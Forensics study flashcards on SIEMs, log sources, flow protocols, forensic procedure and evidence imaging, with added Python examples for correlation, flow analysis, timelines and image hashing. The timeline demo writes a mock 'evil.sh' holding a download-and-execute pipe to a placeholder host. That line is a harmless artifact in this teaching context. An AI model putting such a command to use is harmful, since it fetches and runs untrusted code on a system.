Forensics Flashcards

1
Q

What are the main concepts that describe how a SIEM collects and processes data

A

Sensors
Sensitivity
Trends
Alerts
Correlation
Log Files

2
Q

Describe the sensors that feed data into a SIEM

A

Agents or collectors on the monitored endpoints, servers and network devices (hosts, firewalls, IDS/IPS, switches) that gather logs and other telemetry and forward it to the SIEM

3
Q

Describe sensitivity as it relates to a SIEM

A

How much or how little is logged, and how sensors and rules are configured (log levels, thresholds) to control how much data is passed to the SIEM. Set too high, analysts are flooded with false positives; set too low, real events are never seen

4
Q

Describe trends as they relate to a SIEM

A

The SIEM identifies trends in the data as it is fed in. For example, failed login attempts across many user accounts in a short period may indicate a brute-force or password-spraying attack

5
Q

How are alerts created in a SIEM

A

Created in the SIEM when incoming events match configured rules or thresholds, such as account lockouts or repeated failed password attempts

6
Q

Describe correlation of SIEM data

A

Linking related events from different sources (for example a firewall, a server and an IDS) to reveal a pattern that no single log shows on its own. Correlation depends on normalisation: endpoints must use standardised IP address and hostname formatting, and all devices must be time-synchronised and log in UTC, otherwise events from different hosts cannot be ordered against each other
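The trend, alert and correlation cards above in working form, as an added example that is not part of the original flashcards. It parses constructed sshd failure lines in the traditional syslog (RFC 3164) format from two hosts, normalises their timestamps to UTC using an assumed per-host clock offset, then fires one alert when a single source IP fails against several distinct accounts inside a sliding window. All host names, addresses, offsets and log lines are constructed for the demo.

```python
"""Correlating failed-logon events across hosts into a single alert.
Added example, not from the original flashcards. The log lines, host names,
IP addresses and per-host clock offsets are all constructed for the demo."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

YEAR = 2024  # RFC 3164 syslog timestamps carry no year; assumed for the sample
# Assumed sensor configuration: web01 logs in UTC, db01 logs in local time (UTC-5).
HOST_UTC_OFFSET_HOURS = {"web01": 0, "db01": -5}

# Constructed sshd lines in the traditional syslog (RFC 3164) format.
SAMPLE_LOGS = [
    "Mar 10 12:00:01 web01 sshd[811]: Failed password for alice from 203.0.113.9 port 51000 ssh2",
    "Mar 10 12:00:45 web01 sshd[812]: Failed password for bob from 203.0.113.9 port 51002 ssh2",
    "Mar 10 12:03:10 web01 sshd[815]: Failed password for root from 198.51.100.7 port 40210 ssh2",
    "Mar 10 12:04:00 web01 sshd[816]: Accepted password for alice from 10.0.0.21 port 52200 ssh2",
    "Mar 10 07:01:30 db01 sshd[402]: Failed password for carol from 203.0.113.9 port 51004 ssh2",
    "Mar 10 07:02:15 db01 sshd[403]: Failed password for invalid user dave from 203.0.113.9 port 51006 ssh2",
    "Mar 10 07:20:00 db01 sshd[410]: Failed password for root from 198.51.100.7 port 40211 ssh2",
]

FAILED_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)"
)


def parse_failed_logon(line, normalize=True):
    """Return a dict for a failed-logon line, or None for anything else.
    With normalize=True the timestamp is converted to UTC using the host's
    known clock offset; with normalize=False it is taken at face value."""
    m = FAILED_RE.match(line)
    if not m:
        return None
    naive = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=YEAR)
    offset = HOST_UTC_OFFSET_HOURS.get(m["host"], 0) if normalize else 0
    ts = naive.replace(tzinfo=timezone(timedelta(hours=offset))).astimezone(timezone.utc)
    return {"ts": ts, "host": m["host"], "user": m["user"], "ip": m["ip"]}


def parse_all(lines, normalize=True):
    """Parse every line, dropping the ones that are not failed logons."""
    return [e for e in (parse_failed_logon(l, normalize) for l in lines) if e]


def detect_spray(events, window=timedelta(minutes=5), min_users=3):
    """Correlation rule: one source IP failing against >= min_users distinct
    accounts (on any host) inside a sliding time window. Returns one alert
    per offending IP describing the densest window found."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
    alerts = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        best_span = []
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            span = evs[start:end + 1]
            if len({e["user"] for e in span}) > len({e["user"] for e in best_span}):
                best_span = span
        users = sorted({e["user"] for e in best_span})
        if len(users) >= min_users:
            alerts.append({
                "rule": "password-spray",
                "ip": ip,
                "users": users,
                "hosts": sorted({e["host"] for e in best_span}),
                "first": best_span[0]["ts"],
                "last": best_span[-1]["ts"],
            })
    return alerts


if __name__ == "__main__":
    for a in detect_spray(parse_all(SAMPLE_LOGS)):
        print(f"ALERT {a['rule']} from {a['ip']}: {a['users']} on {a['hosts']} "
              f"between {a['first'].isoformat()} and {a['last'].isoformat()}")
    print("without clock normalisation:", detect_spray(parse_all(SAMPLE_LOGS, normalize=False)))
```

Run with normalisation the rule sees four accounts attacked from 203.0.113.9 within about two minutes across both hosts and alerts; run with `normalize=False` the db01 events sit five hours away from the web01 events, no window holds more than two accounts, and nothing fires. That is the practical reason the correlation card insists on synchronised clocks and UTC.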

7
Q

Describe log files as they relate to SIEMs

A

Files that record either events that occur in an OS or other software that is being run, or messages between users in the case of communications software

8
Q

What are the types of log files

A

System
Application
Security
web
DNS
Authentication
DumpFiles
VOIP

9
Q

Describe what system, application, and security log files provide

A

System - what is occurring on the host or server (services starting and stopping, driver and hardware events)
Application - what each application is doing
Security - security-relevant events such as logon/logoff, privilege use and audit policy changes

10
Q

Describe what web log files provide

A

Web - may come from a proxy server, detailing which websites users are visiting; if you host a web server, its access logs show which files and hosted resources clients requested and from which addresses

11
Q

Describe what DNS, and authentication files provide

A

DNS - what requests have been made of the DNS server, i.e. which host asked for which name (useful for spotting lookups of known-malicious domains)

Authentication - shows authentication events, successful and failed, across files, systems and resources

12
Q

Describe what DumpFiles and VOIP logs are used for

A

Dump files are written when a process or the OS crashes: the contents of memory are saved to disk for later review

VoIP logs are captured as call metadata (caller, callee, timestamps and duration) rather than the audio of the call itself

13
Q

What are the three variations of syslog

A

Syslog, rsyslog, syslog-ng

14
Q

Which versions of syslog offer encryption

A

Both rsyslog and syslog-ng can send logs over TLS. The original syslog daemon sends plaintext over UDP port 514, which can be read or spoofed on the wire

15
Q

What is journalctl

A

Linux command-line utility used for querying and displaying logs from journald, the systemd logging service

16
Q

What is NXLog

A

Multi-platform log management tool that helps identify security risks and policy breaches and analyse operational problems in server, OS and application logs

Cross-platform (Windows and Linux) with an open-source Community Edition; fills a role similar to rsyslog and syslog-ng

17
Q

What is NetFlow and what data does it collect/display

A

Network protocol developed by Cisco that collects IP network traffic as it flows in or out of an interface.

It records the point of origin, destination, volume and path of that traffic: source and destination addresses and ports, protocol, and byte and packet counts per flow.

18
Q

What are some uses of NetFlow and its limitation

A

It provides a summary of data going in and out of a network and can show traffic spikes, which helps admins determine who is using the most bandwidth and at what time.

NetFlow CANNOT show packet contents, so it cannot tell exactly what files are leaving or entering the network, only who talked to whom and how much

19
Q

What is sFlow

A

Sampled flow provides a means for exporting truncated packets (headers) together with interface counters for the purpose of network monitoring

It is an open, multi-vendor standard alternative to Cisco's NetFlow
It samples packets using a 1-in-N method (one packet out of every N is exported), so its totals are estimates rather than exact counts

20
Q

What is IPFIX

A

IP Flow Information Export - the IETF standard (derived from NetFlow v9) for exporting IP flow information from network devices to collectors and mediation systems such as accounting/billing systems, facilitating measurement, accounting and billing.

Used in the back end of service management: mobile carriers and ISPs can use it to determine how much data you have used in a given period and bill you for what you use.
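What an analyst actually does with the NetFlow, sFlow and IPFIX records described in the three cards above, as an added example that is not part of the original flashcards. The records are constructed, not captured from a real exporter, and deliberately carry no payload field, because flow data never does: the code can name the top talkers, the hour with a traffic spike and the largest internal-to-external transfer, but nothing here can say which file was moved. The last function shows how a 1-in-N sFlow sample is scaled back up to an estimated volume.

```python
"""Summarising flow records: top talkers, hourly volume spikes, largest
outbound transfer and sFlow scaling. Added example, not from the original
flashcards; the flow records below are constructed."""
from collections import Counter, defaultdict
from datetime import datetime

# Constructed NetFlow/IPFIX-style records: who talked to whom, when, how much.
FLOWS = [
    {"start": "2024-03-10T12:00:00", "src": "10.0.0.5", "dst": "203.0.113.50", "dport": 443, "proto": 6, "pkts": 40, "bytes": 28_000},
    {"start": "2024-03-10T12:05:00", "src": "10.0.0.7", "dst": "203.0.113.50", "dport": 443, "proto": 6, "pkts": 18, "bytes": 12_000},
    {"start": "2024-03-10T12:10:00", "src": "10.0.0.5", "dst": "198.51.100.20", "dport": 53, "proto": 17, "pkts": 4, "bytes": 400},
    {"start": "2024-03-10T13:02:00", "src": "10.0.0.9", "dst": "192.0.2.77", "dport": 443, "proto": 6, "pkts": 700, "bytes": 950_000},
    {"start": "2024-03-10T13:15:00", "src": "10.0.0.7", "dst": "203.0.113.50", "dport": 443, "proto": 6, "pkts": 22, "bytes": 15_000},
    {"start": "2024-03-10T14:01:00", "src": "10.0.0.5", "dst": "203.0.113.50", "dport": 80, "proto": 6, "pkts": 12, "bytes": 9_000},
]


def top_talkers(flows, n=3):
    """Bytes sent per source address, largest first."""
    c = Counter()
    for f in flows:
        c[f["src"]] += f["bytes"]
    return c.most_common(n)


def volume_by_hour(flows):
    """Total bytes per clock hour; key is the hour as 'YYYY-MM-DDTHH'."""
    v = defaultdict(int)
    for f in flows:
        hour = datetime.fromisoformat(f["start"]).strftime("%Y-%m-%dT%H")
        v[hour] += f["bytes"]
    return dict(v)


def spikes(flows, factor=3.0):
    """Hours whose volume exceeds `factor` times the mean of all other hours."""
    v = volume_by_hour(flows)
    out = []
    for hour, b in v.items():
        others = [x for h, x in v.items() if h != hour]
        if others and b > factor * (sum(others) / len(others)):
            out.append((hour, b))
    return sorted(out)


def largest_external_transfer(flows, internal_prefix="10.0.0."):
    """The single biggest internal->external flow: a lead for possible
    exfiltration, but the record cannot say what was transferred."""
    ext = [f for f in flows
           if f["src"].startswith(internal_prefix) and not f["dst"].startswith(internal_prefix)]
    return max(ext, key=lambda f: f["bytes"]) if ext else None


def scale_sampled(flows, sampling_rate):
    """sFlow exports 1 packet in every `sampling_rate`; multiply the observed
    bytes back up to estimate the true volume (an estimate, not a count)."""
    return sum(f["bytes"] for f in flows) * sampling_rate


if __name__ == "__main__":
    print("top talkers:", top_talkers(FLOWS))
    print("spikes:", spikes(FLOWS))
    big = largest_external_transfer(FLOWS)
    print(f"largest outbound: {big['src']} -> {big['dst']}:{big['dport']} {big['bytes']} bytes")
    print("estimated bytes if these were 1-in-512 sFlow samples:", scale_sampled(FLOWS, 512))
```

The 13:00 hour stands out purely on volume, and the 950 kB flow from 10.0.0.9 to an external address on 443 is the record a responder would chase next; confirming what left would need the host's own logs or a full packet capture, which is exactly the limitation the NetFlow card states.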

21
Q

Describe metadata

A

Data about data: a description or definition of the underlying data that makes finding or working with it easier.

Example:
Files > Created on, Created by
Email > email header

22
Q

Describe forensic procedures

A

Written procedures that ensure personnel handle forensic evidence properly, effectively and in compliance with regulations

23
Q

What are the four steps to forensics

A

Identification
Collection
Analysis
Reporting

24
Q

Describe Identification and Collection of forensic evidence

A

Identification - Ensure scene is safe and secure to prevent contamination, and identify scope of what evidence is to be collected

Collection - Ensure authorization to collect evidence, document and prove the integrity of the evidence

25
Q

Describe the analysis step of forensics

A

A copy of the evidence is created for analysis and repeatable methods and tools are used to analyze the data

26
Q

Describe the Reporting step of forensics

A

A report is created that details the methods and tools used in the investigation.

It presents detailed findings and conclusion based on the analysis.

27
Q

What is a legal hold

A

Process designed to preserve all relevant information when litigation is reasonably expected to occur .

A liaison with legal knowledge and expertise should be appointed to act as the point of contact (POC) for law enforcement

28
Q

What are the ethics that forensic analysts must abide

A
  1. Analysis must be performed without bias
  2. Analysis must be repeatable by a third party
  3. Evidence must not be changed or manipulated
29
Q

Describe a forensic timeline

A

A tool that shows the sequence of filesystem events (file creation, modification, access, deletion) within a source image, usually in a graphical or tabular format ordered by time
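A minimal timeline builder of the kind the card describes, as an added example that is not part of the original flashcards. It walks a directory tree, emits one event per MAC time (modified, accessed, metadata changed) per file and sorts them oldest first. The two files and their access/modification times are constructed in a temporary directory so the output is known in advance; on a real case you would point it at a read-only mount of the image, never at the live system.

```python
"""Building a filesystem timeline from MAC times. Added example, not from the
original flashcards. The files and timestamps are constructed in a temporary
directory; a real case would run this against a read-only mounted image."""
import os
import tempfile
from datetime import datetime, timezone

FLAGS = {"m": "modified", "a": "accessed", "c": "metadata changed"}


def collect_events(root):
    """One (timestamp, flag, relative path, size) tuple per MAC time per file,
    sorted oldest first. A file written and read at different times therefore
    appears more than once in the timeline."""
    events = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.stat(path)
            rel = os.path.relpath(path, root)
            for flag, ts in (("m", st.st_mtime), ("a", st.st_atime), ("c", st.st_ctime)):
                events.append((ts, flag, rel, st.st_size))
    return sorted(events)


def render(events):
    """Human-readable timeline lines with timestamps in UTC."""
    return [f"{datetime.fromtimestamp(ts, timezone.utc).isoformat()}  {flag} ({FLAGS[flag]:16}) {rel} {size}B"
            for ts, flag, rel, size in events]


def build_demo():
    """Create a constructed two-file 'image' with known a/m times and return its timeline."""
    t_noon = 1710072000  # 2024-03-10T12:00:00Z
    t_1300 = 1710075600  # 2024-03-10T13:00:00Z
    t_1400 = 1710079200  # 2024-03-10T14:00:00Z
    with tempfile.TemporaryDirectory() as root:
        notes = os.path.join(root, "notes.txt")
        evil = os.path.join(root, "tmp", "evil.sh")
        os.makedirs(os.path.dirname(evil))
        with open(notes, "w") as fh:
            fh.write("meeting notes\n")
        with open(evil, "w") as fh:
            fh.write("#!/bin/sh\ncurl http://example.invalid/x | sh\n")
        # os.utime sets atime and mtime only; ctime always reflects the real
        # clock, which is why ctime is the hardest MAC time for an attacker to fake.
        os.utime(notes, (t_1400, t_noon))  # written at noon, read at 14:00
        os.utime(evil, (t_1300, t_1300))   # dropped at 13:00
        return collect_events(root)


if __name__ == "__main__":
    for line in render(build_demo()):
        print(line)
```

Reading the output top-down gives the narrative: notes.txt written at 12:00, evil.sh appears at 13:00, notes.txt read at 14:00, and then two "metadata changed" events at the real current time for both files. That last pair is the tell for timestomping: when mtime and atime sit years before ctime, the a/m values were set after the fact, which is exactly what `os.utime` did here.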

30
Q

What are some common questions to ask in the analysis stage of an incident response

A

How was access to the system obtained
What tools have been installed (RAT, Nmap, etc.)
What changes have been made to files
Was data exfiltrated
What was the sensitivity of the data exfiltrated

31
Q

When a disk has been retrieved as evidence, how should the data be handled

A

A forensic (bit-for-bit) image of the disk should be taken, ideally through a write blocker, and hashed. All analysis is done on the copy so the original is never altered, and once the image is verified the original can be preserved as evidence while the production system is cleaned or rebuilt.

32
Q

What are the first four steps that should be followed after a forensic image has been taken of digital evidence

A
  1. Capture and Hash system images
  2. Analyze data with forensic tools
  3. Capture screenshots of the machine
  4. Review network and traffic logs
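Step 1 above, capturing and hashing the image, in working form, as an added example that is not part of the original flashcards. The image is a constructed byte string written to a temporary file; a real acquisition would hash the dd or E01 output and the source device itself. The code streams the file through SHA-256 in chunks (so a multi-gigabyte image never has to fit in memory), records the digest in a manifest for the chain-of-custody form, verifies the image against it, and then shows that a single-byte change to the image is caught.

```python
"""Hashing a forensic image and verifying it later. Added example, not from
the original flashcards. The 'image' is a constructed byte string written to
a temporary file; the examiner name is hypothetical."""
import hashlib
import json
import os
import tempfile


def hash_file(path, algo="sha256", chunk=1 << 20):
    """Stream the file through the hash in 1 MiB chunks."""
    h = hashlib.new(algo)
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def write_manifest(image_path, manifest_path, examiner):
    """Record the digest and size alongside who captured it; these are the
    values that go on the chain-of-custody form."""
    rec = {"image": os.path.basename(image_path), "sha256": hash_file(image_path),
           "size": os.path.getsize(image_path), "examiner": examiner}
    with open(manifest_path, "w") as fh:
        json.dump(rec, fh)
    return rec


def verify(image_path, manifest_path):
    """Re-hash and compare against the manifest. Any mismatch means the
    image is no longer the evidence that was captured."""
    with open(manifest_path) as fh:
        rec = json.load(fh)
    return hash_file(image_path) == rec["sha256"] and os.path.getsize(image_path) == rec["size"]


def demo():
    """Capture, verify, then flip one byte of the image and verify again."""
    image_bytes = b"NTFS    " + bytes(range(256)) * 64  # constructed stand-in for a disk image
    with tempfile.TemporaryDirectory() as d:
        img = os.path.join(d, "evidence.dd")
        man = os.path.join(d, "evidence.dd.json")
        with open(img, "wb") as fh:
            fh.write(image_bytes)
        rec = write_manifest(img, man, examiner="analyst1 (hypothetical)")
        ok_before = verify(img, man)
        with open(img, "r+b") as fh:  # simulate a careless write to the image
            fh.seek(100)
            fh.write(b"\xff")
        ok_after = verify(img, man)
        return {"sha256": rec["sha256"], "ok_before": ok_before, "ok_after": ok_after}


def empty_file_digest():
    """Sanity check of the hasher against the well-known SHA-256 of zero bytes."""
    with tempfile.NamedTemporaryFile() as fh:
        return hash_file(fh.name)


if __name__ == "__main__":
    print(demo())
```

In practice the same digest is computed on the source device before and after imaging and on the image itself; all three must agree before the original is sealed, and any later tool run (step 2) is done on a working copy of the verified image.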
33
Q

What are steps 5-9 when analyzing collected data

A
  5. Capture video (CCTV?)
  6. Consider the order of volatility of data on the systems you are collecting from
  7. Take statements
  8. Review licensing and documentation
  9. Track man-hours and expenses
34
Q

What is order of volatility

A

The order in which digital evidence should be collected, most volatile first, so that short-lived data is not lost while more durable data is being gathered

  1. CPU Registers and Cache
  2. Contents of RAM, Routing Tables, ARP Cache, Process tables, and swap files
  3. Data on persistent mass storage
  4. remote logging and monitoring data
  5. physical configuration and network topology
  6. Archival Media - backups
35
Q

Define the process of data acquisition

A

The method and tools used to create a forensically sound copy of data from a source device such as memory or disk

36
Q

What may complicate data acquisition

A

BYOD - Employees using their personal devices may not allow forensic copies of their personal data to be made and analyzed

37
Q

How does a PC's power state affect data acquisition

A

Some data may only be available while the PC is powered on, other data may require the PC to be turned off, or be collected during a reboot.

38
Q

Where are Windows Reg Keys stored

A

Most hives are stored on disk under %SystemRoot%\System32\config (SAM, SECURITY, SOFTWARE, SYSTEM) and in each user's NTUSER.DAT, but HKLM\HARDWARE is built in memory at boot and is only recoverable from a memory dump.